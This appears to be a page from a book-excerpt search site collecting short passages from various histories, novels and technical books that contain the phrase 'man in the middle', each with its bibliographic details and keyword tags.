250, 255, 258 window object, 248 with statement, 131 word boundary, 151 word character, 147, 151, 162 work list, 124, 343 workbench (exercise), 330, 422 world, of a game, 265 World Wide Web, 5, 77, 219, 221, 224, 225, 311 writable stream, 360–363, 364 write method, 360, 361 writeFile function, 359, 361, 425 writeHead method, 360 writing code, 6, 117 writing system, 87 WWW, see World Wide Web X XML, 230, 288 XML namespace, 288 xmlns attribute, 288 Y yield (reserved word), 26 yield keyword, 197 your own loop (example), 95 Yuan-Ma, 10, 352 Z Zawinski, Jamie, 144 zero-based counting, 56, 61, 150 zeroPad function, 54 zigzag shape, 420 zooming, 305 Eloquent JavaScript, 3rd Edition is set in New Baskerville, Futura, Dogma, and TheSansMono Condensed.


pages: 563 words: 136,190

The Next Shift: The Fall of Industry and the Rise of Health Care in Rust Belt America by Gabriel Winant

affirmative action, Affordable Care Act / Obamacare, anti-communist, antiwork, blue-collar work, business cycle, Capital in the Twenty-First Century by Thomas Piketty, classic study, clean water, collective bargaining, company town, coronavirus, COVID-19, creative destruction, deindustrialization, desegregation, deskilling, emotional labour, employer provided health coverage, Erik Brynjolfsson, Ford paid five dollars a day, full employment, future of work, ghettoisation, independent contractor, invisible hand, Kitchen Debate, labor-force participation, longitudinal study, low skilled workers, mandatory minimum, manufacturing employment, mass incarceration, MITM: man-in-the-middle, moral hazard, new economy, New Urbanism, obamacare, opioid epidemic / opioid crisis, pink-collar, post-industrial society, post-work, postindustrial economy, price stability, RAND corporation, Ronald Reagan, Second Machine Age, secular stagnation, the built environment, union organizing, upwardly mobile, urban renewal, vertical integration, War on Poverty, white flight, Wolfgang Streeck, women in the workforce, work culture , working poor

Benjamin Chinitz, “Contrasts in Agglomeration: New York and Pittsburgh,” American Economic Review 51, no. 2 (May 1961), 285; Dillard, An American Childhood, 75, 92, 134; “Supervisors Connected with Civic Activities,” April 16, 1957, box 30, folder 8, USSCDWIRDR; Salaj, “Blue Collar Memories”; Wickerham, interview. Deborah Rudacille, Roots of Steel: Boom and Bust in an American Mill Town (New York: Pantheon, 2010), 18. See Nelson Lichtenstein, “The Man in the Middle: A Social History of Automobile Industry Foremen,” in On the Line: Essays in the History of Auto Work, ed. Nelson Lichtenstein and Stephen Meyer (Urbana: University of Illinois Press, 1989). 30. “Rules and Regulations Governing the Operations of the Duquesne Luncheon Club,” ca. 1957, box 27, USSCDWIRDR. 31.


Reaganland: America's Right Turn 1976-1980 by Rick Perlstein

8-hour work day, Aaron Swartz, affirmative action, air traffic controllers' union, airline deregulation, Alan Greenspan, Alistair Cooke, Alvin Toffler, American Legislative Exchange Council, anti-communist, Apollo 13, Ayatollah Khomeini, Berlin Wall, Bernie Sanders, Boeing 747, Brewster Kahle, business climate, clean water, collective bargaining, colonial rule, COVID-19, creative destruction, crowdsourcing, cuban missile crisis, currency peg, death of newspapers, defense in depth, Deng Xiaoping, desegregation, disinformation, Donald Trump, Dr. Strangelove, energy security, equal pay for equal work, facts on the ground, feminist movement, financial deregulation, full employment, global village, Golden Gate Park, guns versus butter model, illegal immigration, In Cold Blood by Truman Capote, index card, indoor plumbing, Internet Archive, invisible hand, Julian Assange, Kitchen Debate, kremlinology, land reform, low interest rates, Marshall McLuhan, mass immigration, military-industrial complex, MITM: man-in-the-middle, Monroe Doctrine, moral panic, multilevel marketing, mutually assured destruction, New Journalism, oil shock, open borders, Peoples Temple, Phillips curve, Potemkin village, price stability, Ralph Nader, RAND corporation, rent control, road to serfdom, Robert Bork, Robert Solow, rolodex, Ronald Reagan, Rosa Parks, Saturday Night Live, Silicon Valley, Suez crisis 1956, three-martini lunch, traveling salesman, unemployed young men, union organizing, unpaid internship, Unsafe at Any Speed, Upton Sinclair, upwardly mobile, urban decay, urban planning, urban renewal, wages for housework, walking around money, War on Poverty, white flight, WikiLeaks, Winter of Discontent, yellow journalism, Yom Kippur War, zero-sum game

Michael Parrish, “How Dorie Miller’s Bravery Helped Fight Navy Racism,” World War II Magazine, October 31, 2019. “like overripe fruit” Richard Reeves, President Reagan: The Triumph of Imagination (New York: Simon & Schuster, 2005), 154; Robert Welch, The Blue Book of the John Birch Society (Belmont, MA: Western Islands, 1961) 11. “You remember Nancy” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 155. prospects of Jack Kemp ENIR, July 24, 1978. “Maybe it wouldn’t” Los Angeles Times Service, December 7, 1976. dinner at Stanford George Schultz, Turmoil and Triumph: My Years as Secretary of State (New York: Scribner, 1993).

The Pittsburgh Press’s article “Here’s Partial List of Open Stations,” “How Carter’s Carnegie Visit Was Kept a Secret,” “Violence Threatened If Fuel Redistributed,” “Carter, Residents Hold Mini-Summit,” all on page A-4, Pittsburgh Press, July 13, 1979. “They were pleased” Carter, White House Diary, 343. “almost frightening” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 136. Then came a final meeting Gordon Stewart, “Carter’s Speech Therapy,” NYT, July 14, 1979; Schlesinger, White House Ghosts, 302. Camp David movie theater Schlesinger, White House Ghosts, 303–4; Hendrik Hertzberg, “A Very Merry Malaise,” NewYorker.com, July 17, 2009.

wandering into staff meetings See n.d. notes, early 9/79, page 8, “No nation can survive under fiat money”; “Meeting on Public Policy Issues,” September 6, 1979; both RRPL, Box 103, “Meetings—9/1979” folder. See also PH, Box 11, Fred Iklé, for working drafts of fall 1979 policy position statements. Germond was skeptical Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 150–52. vituperation directed at Jackson Ian Shapiro, The Last Great Senate: Courage and Statesmanship in Times of Crisis (New York: Public Affairs Books, 2012), 292. North American Aerospace Defense Command July 30 and July 31, 1979, schedule, RRPL, Box 76; Frances FitzGerald, Way Out There in the Blue: Reagan, Star Wars, and the End of the Cold War (New York: Simon & Schuster, 2000), 20–21; Robert Scheer, With Enough Shovels: Reagan, Bush, and Nuclear War (New York: Random House, 1982), 104, 232.


pages: 537 words: 149,628

Ghost Fleet: A Novel of the Next World War by P. W. Singer, August Cole

3D printing, Admiral Zheng, air gap, augmented reality, British Empire, digital map, energy security, Firefox, glass ceiling, global reserve currency, Google Earth, Google Glasses, IFF: identification friend or foe, Just-in-time delivery, low earth orbit, Maui Hawaii, military-industrial complex, MITM: man-in-the-middle, new economy, old-boy network, operational security, RAND corporation, reserve currency, RFID, Silicon Valley, Silicon Valley startup, South China Sea, sovereign wealth fund, space junk, stealth mode startup, three-masted sailing ship, trade route, Virgin Galactic, Wall-E, We are Anonymous. We are Legion, WikiLeaks, zero day, zero-sum game

Then he noticed that they were tensing up as the elevator lights numbered ever closer to their floor. The door opened and another armed phalanx emerged; these bodyguards were Caucasian in ethnicity and wearing civilian suits, but they were clearly military. While the two groups eyed each other warily, Wang watched how the elderly man in the middle didn’t bother even to look up from the outdated computer tablet he tapped away on. Red diamonds and purple hearts reflected in his traditional eyeglasses. He was surprisingly fit for his age, but supposedly the old Russian spy was addicted to memory-improving games, an effort to stave off what Directorate intelligence suspected was dementia.


pages: 478 words: 149,810

We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency by Parmy Olson

4chan, Asperger Syndrome, bitcoin, call centre, Chelsea Manning, corporate governance, crowdsourcing, disinformation, Firefox, Gabriella Coleman, hive mind, it's over 9,000, Julian Assange, lolcat, Minecraft, MITM: man-in-the-middle, Occupy movement, off-the-grid, peer-to-peer, pirate software, side project, Skype, speech recognition, SQL injection, Stephen Hawking, Stuxnet, We are Anonymous. We are Legion, We are the 99%, web application, WikiLeaks, zero day

A database with passwords was worth more, since spammers could then send spam from legitimate addresses. Occasionally a thread would start with a post seeking “freelancers” who could program in C, Objective-C, C#, VB, Java, and JavaScript. One post from June of 2010 had the title “DGs [Digital Gangsters] in Washington? Be my mail man in the middle,” followed by: “Heres how it works. A delivery gets shipped to your address, You open the package remove item, Reship the item to me in a new container with a false return address. when item arrives you get paid. interested?” The description of Jin-Soo Byun was sourced from interviews with Jennifer Emick and Laurelai Bailey; the note that Aaron Barr was helping her investigation was sourced from an interview with Barr.


pages: 489 words: 148,885

Accelerando by Stross, Charles

book value, business cycle, call centre, carbon-based life, cellular automata, cognitive dissonance, commoditize, Conway's Game of Life, dark matter, disinformation, dumpster diving, Extropian, financial engineering, finite state, flag carrier, Flynn Effect, Future Shock, glass ceiling, gravity well, John von Neumann, junk bonds, Kickstarter, knapsack problem, Kuiper Belt, machine translation, Magellanic Cloud, mandelbrot fractal, market bubble, means of production, military-industrial complex, MITM: man-in-the-middle, Neal Stephenson, orbital mechanics / astrodynamics, packet switching, performance metric, phenotype, planetary scale, Pluto: dwarf planet, quantum entanglement, reversible computing, Richard Stallman, satellite internet, SETI@home, Silicon Valley, Singularitarianism, Skinner box, slashdot, South China Sea, stem cell, technological singularity, telepresence, The Chicago School, theory of mind, Turing complete, Turing machine, Turing test, upwardly mobile, Vernor Vinge, Von Neumann architecture, warehouse robotics, web of trust, Y2K, zero-sum game

And because he's still basically a little kid, and not fully in control of his own metaprogramming, instead of adjusting his outlook so that he isn't bored anymore, he sneaks out through his bedroom gate (which big-Manni-ghost reprogrammed for him sometime ago so that it would forward to an underused public A-gate that he'd run a man-in-the-middle hack on, so he could use it as a proxy teleport server) then down to the underside of Red Plaza, where skinless things gibber and howl at their tormentors, broken angels are crucified on the pillars that hold up the sky, and gangs of semiferal children act out their psychotic fantasies on mouthless android replicas of parents and authorities.


pages: 559 words: 155,372

Chaos Monkeys: Obscene Fortune and Random Failure in Silicon Valley by Antonio Garcia Martinez

Airbnb, airport security, always be closing, Amazon Web Services, Big Tech, Burning Man, business logic, Celtic Tiger, centralized clearinghouse, cognitive dissonance, collective bargaining, content marketing, corporate governance, Credit Default Swap, crowdsourcing, data science, deal flow, death of newspapers, disruptive innovation, Dr. Strangelove, drone strike, drop ship, El Camino Real, Elon Musk, Emanuel Derman, Fairchild Semiconductor, fake it until you make it, financial engineering, financial independence, Gary Kildall, global supply chain, Goldman Sachs: Vampire Squid, Hacker News, hive mind, How many piano tuners are there in Chicago?, income inequality, industrial research laboratory, information asymmetry, information security, interest rate swap, intermodal, Jeff Bezos, Kickstarter, Malcom McLean invented shipping containers, Marc Andreessen, Mark Zuckerberg, Maui Hawaii, means of production, Menlo Park, messenger bag, minimum viable product, MITM: man-in-the-middle, move fast and break things, Neal Stephenson, Network effects, orbital mechanics / astrodynamics, Paul Graham, performance metric, Peter Thiel, Ponzi scheme, pre–internet, public intellectual, Ralph Waldo Emerson, random walk, Reminiscences of a Stock Operator, Ruby on Rails, Salesforce, Sam Altman, Sand Hill Road, Scientific racism, second-price auction, self-driving car, Sheryl Sandberg, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, Social Justice Warrior, social web, Socratic dialogue, source of truth, Steve Jobs, tech worker, telemarketer, the long tail, undersea cable, urban renewal, Y Combinator, zero-sum game, éminence grise

Figure out a point of overlooked business or technical leverage, interpose some piece of cleverness, and gleefully marvel at the resulting disruption (or destruction). In that spirit did we respond to my favorite question on the YC application:* What (non-computer) system have you ever hacked? I conducted a man-in-the-middle attack on Craigslist’s online dating ads. I posted an ad as a woman looking for a man, and as a man looking for a woman. I’d pass email from real man to fictional woman as the replies of fictional man to the real women, and basically crossed the email streams. At one point I shifted each real person off my fictional email addresses, and to the corresponding opposite-sex real email addresses.


What We Cannot Know: Explorations at the Edge of Knowledge by Marcus Du Sautoy

Albert Michelson, Andrew Wiles, Antoine Gombaud: Chevalier de Méré, Arthur Eddington, banking crisis, bet made by Stephen Hawking and Kip Thorne, Black Swan, Brownian motion, clockwork universe, cosmic microwave background, cosmological constant, dark matter, Dmitri Mendeleev, Eddington experiment, Edmond Halley, Edward Lorenz: Chaos theory, Ernest Rutherford, Georg Cantor, Hans Lippershey, Harvard Computers: women astronomers, heat death of the universe, Henri Poincaré, Higgs boson, invention of the telescope, Isaac Newton, Johannes Kepler, Large Hadron Collider, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, Murray Gell-Mann, music of the spheres, Necker cube, Paul Erdős, Pierre-Simon Laplace, quantum entanglement, Richard Feynman, seminal paper, Skype, Slavoj Žižek, stem cell, Stephen Hawking, technological singularity, Thales of Miletus, Turing test, wikimedia commons

Exactly halfway between them is a third member of the gang. The train is racing through a station. A police officer is watching the scene. Let me first consider the situation on the train. As far as the gang members are concerned, the train can be considered at rest. The guns go off. The bullets hit the man in the middle at the same time. The speed of the bullets and the distance they have to cover is the same, and as far as everyone on the train is concerned the gunmen both shot at the same moment. Indeed, the victim saw light flash from the guns at the same moment, just before being hit by the bullets. But what about the perspective of the police officer?


Days of Fire: Bush and Cheney in the White House by Peter Baker

"Hurricane Katrina" Superdome, addicted to oil, Alan Greenspan, anti-communist, battle of ideas, Bear Stearns, Berlin Wall, Bernie Madoff, Bob Geldof, Boeing 747, buy low sell high, carbon tax, card file, clean water, collective bargaining, cuban missile crisis, desegregation, drone strike, energy security, facts on the ground, failed state, Fall of the Berlin Wall, friendly fire, Glass-Steagall Act, guest worker program, hiring and firing, housing crisis, illegal immigration, immigration reform, information security, Mikhail Gorbachev, MITM: man-in-the-middle, no-fly zone, operational security, Robert Bork, rolling blackouts, Ronald Reagan, Ronald Reagan: Tear down this wall, Saturday Night Live, South China Sea, stem cell, Ted Sorensen, too big to fail, uranium enrichment, War on Poverty, working poor, Yom Kippur War

CHAPTER 17: “WE WERE ALMOST ALL WRONG” 1 “I sure wasn’t going to”: Mary Cheney, Now It’s My Turn, 173–78. 2 “If you feel like you have to”: Ibid. 3 Five picked Gephardt: Gillespie, Winning Right, 51. 4 Jenna dreamed that her father: Thomas and the Staff of Newsweek, Election 2004, xix. 5 “Dean ran an ad with me”: Dick Gephardt, author interview. 6 “He’s done, it’s over”: Matt Schlapp and Dan Bartlett, author interviews. 7 Kerry won with 38 percent: New Hampshire Secretary of State’s office, http://www.sos.nh.gov/presprim2004/dpressum.htm. 8 “Let me begin by saying”: David Kay, testimony before the Senate Armed Services Committee, January 28, 2004, http://www.cnn.com/2004/US/01/28/kay.transcript/. 9 “Why would Saddam do something”: David Kay, author interview. 10 “was the right thing to do”: Colin Powell, interview with the Washington Post, excerpts printed February 3, 2004. 11 “It was something we all”: Barry Schweid, “Powell Says War Decision Was Correct Even If Weapon Stockpiles Did Not Exist,” Associated Press, February 3, 2004. 12 “despite some public statements”: George Tenet, speech at Georgetown University, February 5, 2004, https://www.cia.gov/news-information/speeches-testimony/2004/tenet_georgetownspeech_02052004.html. 13 declined to embrace: Sheryl Stolberg, “White House Avoids Stand on Gay Marriage Measure,” New York Times, July 2, 2003, http://www.nytimes.com/2003/07/02/us/white-house-avoids-stand-on-gay-marriage-measure.html. 14 “heard more about marriage”: Goeglein, Man in the Middle, 120. 15 Bush invited Cheney and top aides: Halperin and Harris, Way to Win, 254–55. 16 “There is a strong sense”: Undated campaign memo, provided to author. 17 “That decision influenced everything”: Matthew Dowd, interview with PBS’s Frontline, January 4, 2005, http://www.pbs.org/wgbh/pages/frontline/shows/architect/interviews/dowd.html. 18 “We have, I reminded him”: Laura Bush, Spoken from the Heart, 302–3. 19 “He brought up the fact”: Dick Cheney, author interview. 20 “Cheney was pissed off”: Cheney friend, author interview. 21 “The union of a man and”: George W.

New York: Simon & Schuster, 2004. Gerson, Michael J. Heroic Conservatism: Why Republicans Need to Embrace America’s Ideals (and Why They Deserve to Fail if They Don’t). San Francisco: HarperOne, 2007. Gillespie, Ed. Winning Right: Campaign Politics and Conservative Policies. New York: Threshold, 2006. Goeglein, Tim. The Man in the Middle: An Inside Account of Faith and Politics in the George W. Bush Era. Nashville: B&H, 2011. Goldsmith, Jack L. The Terror Presidency: Law and Judgment Inside the Bush Administration. New York: W. W. Norton, 2007. Gordon, Michael, and Bernard E. Trainor. Cobra II: The Inside Story of the Invasion and Occupation of Iraq.


pages: 554 words: 168,114

Oil: Money, Politics, and Power in the 21st Century by Tom Bower

"World Economic Forum" Davos, addicted to oil, Alan Greenspan, An Inconvenient Truth, Ayatollah Khomeini, banking crisis, bonus culture, California energy crisis, corporate governance, credit crunch, energy security, Exxon Valdez, falling living standards, fear of failure, financial engineering, forensic accounting, Global Witness, index fund, interest rate swap, John Deuss, Korean Air Lines Flight 007, kremlinology, land bank, LNG terminal, Long Term Capital Management, margin call, megaproject, Meghnad Desai, Mikhail Gorbachev, millennium bug, MITM: man-in-the-middle, Nelson Mandela, new economy, North Sea oil, offshore financial centre, oil shale / tar sands, oil shock, Oscar Wyatt, passive investing, peak oil, Piper Alpha, price mechanism, price stability, Ronald Reagan, shareholder value, short selling, Silicon Valley, sovereign wealth fund, transaction costs, transfer pricing, zero-sum game, éminence grise

Explorers using 3D and 4D seismic, horizontal drills, multilateral wells and smart infill drilling were likely to increase production from mature wells and revive dry ones to extract over 50 percent of the oil, as BP had accomplished at Thunder Horse. The world consumed about 30 billion barrels every year. Contrary to Campbell’s scenario, the problem was not how much oil was in the ground, but how much the producers would spend to extract it. Guy Caruso, the head of the EIA, was the man in the middle of the two sides’ increasingly sterile arguments. Appointed by the George W. Bush administration in 2002 after serving for 12 years as an energy analyst at the CIA, Caruso had won star status by correctly forecasting the 1973 crisis, but he had also been involved in the mistaken CIA forecast in 1977 that Russia would become a net oil importer.


pages: 600 words: 165,682

The Accidental Empire: Israel and the Birth of the Settlements, 1967-1977 by Gershom Gorenberg

anti-communist, bank run, colonial rule, facts on the ground, Great Leap Forward, illegal immigration, MITM: man-in-the-middle, Mount Scopus, old-boy network, Suez crisis 1956, urban planning, Yom Kippur War

As the years passed, the pain and shame became stronger,” Katzover recalled—shame that there was “empty territory,” that “the whole world sees…Samaria is empty.” In 1972 the idea still did not occur to Katzover that he would do something about it himself. But in his testimony, as in Etzion’s, is the first scent of an intoxicating impatience.39 THE MOST impatient man in the Middle East, though, was Anwar al-Sadat. Egypt’s leader wanted the Sinai Peninsula back. Recalling the lessons of his Nile Delta peasant childhood, speaking of neighbors who would fight for fifty years over a meter of land, he said in a New York Times interview after taking power that “our land…means our honor here…and one dies for this honor.”


pages: 577 words: 171,126

Light This Candle: The Life & Times of Alan Shepard--America's First Spaceman by Neal Thompson

Apollo 11, Apollo 13, built by the lowest bidder, Charles Lindbergh, Columbine, cuban missile crisis, Donald Trump, low interest rates, military-industrial complex, MITM: man-in-the-middle, Neil Armstrong, Norman Mailer, place-making, Silicon Valley, William Langewiesche

That made some of the press happy but earned Shorty complaints from NASA and the astronauts that he was exploiting the Mercury Seven. “I think all seven guys really enjoyed the exposure—they are human and they don’t mind seeing their names in the papers,” Shorty once said. “Yet, as test pilots, they instinctively rebelled at having to spend time with the news media.” That continuous problem of being the man in the middle would literally drive Shorty to drink. A lot. And drink would one day cost him his job and, eventually, his life. In an effort to smooth the feathers that his press policies had ruffled, Shorty one day gathered the seven in a room at Langley and tried to explain that many reporters continued to accuse him, and the astronauts, of giving the Life people special access.


pages: 544 words: 168,076

Red Plenty by Francis Spufford

Adam Curtis, affirmative action, anti-communist, Anton Chekhov, asset allocation, Buckminster Fuller, clean water, cognitive dissonance, computer age, double helix, Fellow of the Royal Society, John von Neumann, Kickstarter, Kim Stanley Robinson, Kitchen Debate, linear programming, lost cosmonauts, market clearing, MITM: man-in-the-middle, New Journalism, oil shock, Philip Mirowski, plutocrats, profit motive, RAND corporation, scientific management, Simon Kuznets, the scientific method

Riffle riffle went the invisible card index. Ah yes, Ryszard: early forties, Pole from the Ukraine, wife religious, lots of children. Pleasant chap. Drinking problem. Probably not destined to rise. Chekuskin put the coin in the slot and dialled. ‘Ryszard, yes, hello?’ Harried-sounding voice; a man in the middle of something. ‘Chekuskin here. Sorry to bother you –’ ‘I can’t really talk. Later would be better.’ ‘Of course, of course, whenever you can. Maybe a drink this evening?’ ‘I don’t know. I’ve a family do. God, this is the Solkemfib thing, isn’t it?’ ‘Well, yes. There’s some puzzlement at this end –’ ‘I’m sorry, Chekuskin, but really, that’s one to leave alone.


pages: 678 words: 159,840

The Debian Administrator's Handbook, Debian Wheezy From Discovery to Mastery by Raphaal Hertzog, Roland Mas

bash_history, Debian, distributed generation, do-ocracy, en.wikipedia.org, end-to-end encryption, failed state, Firefox, Free Software Foundation, GnuPG, Google Chrome, Jono Bacon, MITM: man-in-the-middle, Neal Stephenson, NP-complete, precautionary principle, QWERTY keyboard, RFC: Request For Comment, Richard Stallman, Skype, SpamAssassin, SQL injection, Valgrind, web application, zero day, Zimmermann PGP

First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x). Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks. CULTURE DNSSEC The DNSSEC norm is quite complex; this partly explains why it's not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. → http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions 10.6.2.


pages: 598 words: 172,137

Who Stole the American Dream? by Hedrick Smith

Affordable Care Act / Obamacare, Airbus A320, airline deregulation, Alan Greenspan, anti-communist, asset allocation, banking crisis, Bear Stearns, Boeing 747, Bonfire of the Vanities, British Empire, business cycle, business process, clean water, cloud computing, collateralized debt obligation, collective bargaining, commoditize, corporate governance, Credit Default Swap, credit default swaps / collateralized debt obligations, currency manipulation / currency intervention, David Brooks, Deng Xiaoping, desegregation, Double Irish / Dutch Sandwich, family office, financial engineering, Ford Model T, full employment, Glass-Steagall Act, global supply chain, Gordon Gekko, guest worker program, guns versus butter model, high-speed rail, hiring and firing, housing crisis, Howard Zinn, income inequality, independent contractor, index fund, industrial cluster, informal economy, invisible hand, John Bogle, Joseph Schumpeter, junk bonds, Kenneth Rogoff, Kitchen Debate, knowledge economy, knowledge worker, laissez-faire capitalism, Larry Ellison, late fees, Long Term Capital Management, low cost airline, low interest rates, manufacturing employment, market fundamentalism, Maui Hawaii, mega-rich, Michael Shellenberger, military-industrial complex, MITM: man-in-the-middle, mortgage debt, negative equity, new economy, Occupy movement, Own Your Own Home, Paul Samuelson, Peter Thiel, Plutonomy: Buying Luxury, Explaining Global Imbalances, Ponzi scheme, Powell Memorandum, proprietary trading, Ralph Nader, RAND corporation, Renaissance Technologies, reshoring, rising living standards, Robert Bork, Robert Shiller, rolodex, Ronald Reagan, Savings and loan crisis, shareholder value, Shenzhen was a fishing village, Silicon Valley, Silicon Valley startup, Solyndra, Steve Jobs, stock buybacks, tech worker, Ted Nordhaus, The Chicago School, The Spirit Level, too big to fail, transaction costs, transcontinental railway, union organizing, Unsafe at Any Speed, Vanguard fund, We are the 99%, women in the workforce, working poor, Y2K

Bush, the White House, and the Education of Paul O’Neill (New York: Simon & Schuster, 2004), 150. 8 That very morning “Key Goals Face Early Obstacles,” The Washington Post, February 27, 2001. 9 An NBC/Wall Street Journal poll “Public Buys Bush’s Tax-Cut Plan, but Details Magnify Differences,” The Wall Street Journal, March 8, 2001. 10 An even stronger tilt “Poll Analysis: Bush in Honeymoon Period,” Los Angeles Times, March 8, 2001. 11 “Washington derives so much of its power” Stevenson, “Itching to Rebuild the Tax Law.” 12 “Dirk is always well positioned” Jeffrey Birnbaum, “The Man in the Middle,” CNNMoney.​com, April 1, 2002, http://​money.​cnn.​com. 13 “That coalition was very important” Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 14 “The President has it backwards” “Bush Pushes Huge Tax Cut in U.S. Congress Debut,” Dallas Morning News, February 28, 2001. 15 Protests in several cities “Union Campaigns to Thwart Tax Cut Plan,” Atlanta Daily World, April 8, 2001. 16 Bush was the one urging voters Marc Lacey, “Bush Deploys Charm on Daschle in Pushing Tax Cut,” The New York Times, March 10, 2001. 17 A staggering $2 billion Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 18 The Business Roundtable The Center for Responsive Politics reported business interests pouring $333 million into the 2009–10 election campaign cycle.


pages: 604 words: 165,488

Mr Five Per Cent: The Many Lives of Calouste Gulbenkian, the World's Richest Man by Jonathan Conlin

accounting loophole / creative accounting, anti-communist, banking crisis, British Empire, carried interest, cotton gin, Ernest Rutherford, estate planning, Fellow of the Royal Society, light touch regulation, military-industrial complex, MITM: man-in-the-middle, Network effects, Pierre-Simon Laplace, rent-seeking, stakhanovite, Suez canal 1869, vertical integration, Yom Kippur War

‘Siyasiyat: İstikraz Etrafında’, Tanin, 19 August 1910, p. 1. 31. Bompard to MAE, 17 October 1910. AMAE, CP Turquie 366, f. 90. For another perspective, see reports of 18 August and 17 September 1910. MBZ, CP Turquie 1909–10, ff. 69, 79. 32. ‘İstikraz Hakkında: Cavit Bey’in Beyanatı’, Tanin, 23 August 1910, p. 1. 33. For Laurent, see Ozan Ozavci, ‘A Man in the Middle: The Mission of Charles Laurent and the Young Turks’, in Gokhan Çetinsaya and Gül Tokay (eds.), Festschrift to Feroze A. K. Yasamee (Istanbul: ISIS Publications, forthcoming). 34. Le Temps, 20 September 1910. Hüseyin Cahit immediately picked up on this story, citing Le Temps as his source. ‘Yeni İstikraz’, Tanin, 20 September 1910, p. 1. 35.


pages: 538 words: 164,533

1968: The Year That Rocked the World by Mark Kurlansky

anti-communist, Berlin Wall, colonial rule, cuban missile crisis, desegregation, Dr. Strangelove, East Village, Electric Kool-Aid Acid Test, European colonialism, feminist movement, global village, Haight Ashbury, Herbert Marcuse, land reform, Marshall McLuhan, Mikhail Gorbachev, military-industrial complex, MITM: man-in-the-middle, Norman Mailer, post-industrial society, Ronald Reagan, South China Sea

Che had sought to build the new man, the socialist who worked for the common good, was dedicated to the revolution, and was without selfishness and greed. Now the new man was sometimes referred to as “a man like Che.” Castro first spoke of the new man in a speech in May 1967, but 1968, with the “revolutionary offensive” under way, was the year of the new man. In the middle of his speech about the new offensive, Castro referred to another new phenomenon. “There almost exists an air route for those who take over planes.” The week of Fidel’s speech, National Airlines flight 28 took off from Tampa bound for Miami. After five minutes in the air, two Cuban exiles took out pistols, forced the flight attendant to open the cockpit, and shouted, “Havana!


pages: 678 words: 160,676

The Upswing: How America Came Together a Century Ago and How We Can Do It Again by Robert D. Putnam

affirmative action, Affordable Care Act / Obamacare, Alan Greenspan, Alvin Toffler, Arthur Marwick, classic study, clean water, collective bargaining, correlation does not imply causation, David Brooks, demographic transition, desegregation, different worldview, Donald Trump, Edward Glaeser, en.wikipedia.org, equal pay for equal work, financial deregulation, gender pay gap, ghettoisation, Gordon Gekko, greed is good, Gunnar Myrdal, guns versus butter model, Herbert Marcuse, Ida Tarbell, immigration reform, income inequality, Kenneth Arrow, knowledge economy, labor-force participation, laissez-faire capitalism, low skilled workers, Mark Zuckerberg, market fundamentalism, mass immigration, mega-rich, meta-analysis, minimum wage unemployment, MITM: man-in-the-middle, obamacare, occupational segregation, open economy, opioid epidemic / opioid crisis, Overton Window, plutocrats, post-industrial society, Powell Memorandum, prosperity theology / prosperity gospel / gospel of success, public intellectual, road to serfdom, Robert Shiller, Ronald Reagan, Scientific racism, Second Machine Age, shareholder value, Silicon Valley, Steve Jobs, Steven Pinker, strikebreaker, The Rise and Fall of American Growth, The Spirit Level, trade liberalization, Travis Kalanick, Triangle Shirtwaist Factory, Tyler Cowen, Tyler Cowen: Great Stagnation, union organizing, Upton Sinclair, upwardly mobile, W. E. B. Du Bois, War on Poverty, white flight, women in the workforce, working poor, Works Progress Administration, yellow journalism

Brands, Traitor to His Class: The Privileged Life and Radical Presidency of Franklin Delano Roosevelt (New York: Doubleday, 2008). 22 On party politics from the 1920s to the 1940s, see Kennedy, Freedom from Fear. 23 Frederick Lewis Allen, Since Yesterday: The 1930s in America, September 3, 1929–September 3, 1939 (New York: Harper & Brothers, 1940), 189: “If a visitor from Mars had compared the two party platforms of 1936, concentrating his attention not on the denunciations and pointings-with-pride but merely upon the positive recommendations which they contained, he might have wondered why feeling ran so high in this campaign.” 24 Hendrik Meijer, Arthur Vandenberg: The Man in the Middle of the American Century (Chicago: University of Chicago Press, 2017), 162. 25 On Congressional politics, see Kennedy, Freedom from Fear, chap. 11, esp. 341–43; and Eric Schickler, “New Deal Liberalism and Racial Liberalism in the Mass Public, 1937–1968,” Perspectives on Politics 11, no. 1 (March 2013): 75–98, doi:10.1017/S1537592712003659: “There was a connection between attitudes towards the economic programs of the New Deal and racial liberalism early on, well before national party elites took distinct positions on civil rights.… The ideological meaning of New Deal liberalism sharpened in the late 1930s due to changes in the groups identified with Roosevelt’s program and due to the controversies embroiling New Dealers in 1937–38.” 26 The figures in the text are averaged across all key votes and where available, both houses of Congress.


Likewar: The Weaponization of Social Media by Peter Warren Singer, Emerson T. Brooking

4chan, active measures, Airbnb, augmented reality, barriers to entry, battle of ideas, Bellingcat, Bernie Sanders, Black Lives Matter, British Empire, Cambridge Analytica, Cass Sunstein, citizen journalism, Citizen Lab, Comet Ping Pong, content marketing, crony capitalism, crowdsourcing, data science, deep learning, digital rights, disinformation, disintermediation, Donald Trump, drone strike, Edward Snowden, en.wikipedia.org, Erik Brynjolfsson, Evgeny Morozov, fake news, false flag, Filter Bubble, global reserve currency, Google Glasses, Hacker Conference 1984, Hacker News, illegal immigration, information security, Internet Archive, Internet of things, invention of movable type, it is difficult to get a man to understand something, when his salary depends on his not understanding it, Jacob Silverman, John Gilmore, John Markoff, Kevin Roose, Kickstarter, lateral thinking, lolcat, Mark Zuckerberg, megacity, Menlo Park, meta-analysis, MITM: man-in-the-middle, Mohammed Bouazizi, Moneyball by Michael Lewis explains big data, moral panic, new economy, offshore financial centre, packet switching, Panopticon Jeremy Bentham, Parag Khanna, pattern recognition, Plato's cave, post-materialism, Potemkin village, power law, pre–internet, profit motive, RAND corporation, reserve currency, sentiment analysis, side project, Silicon Valley, Silicon Valley startup, Snapchat, social web, South China Sea, Steve Bannon, Steve Jobs, Steven Levy, 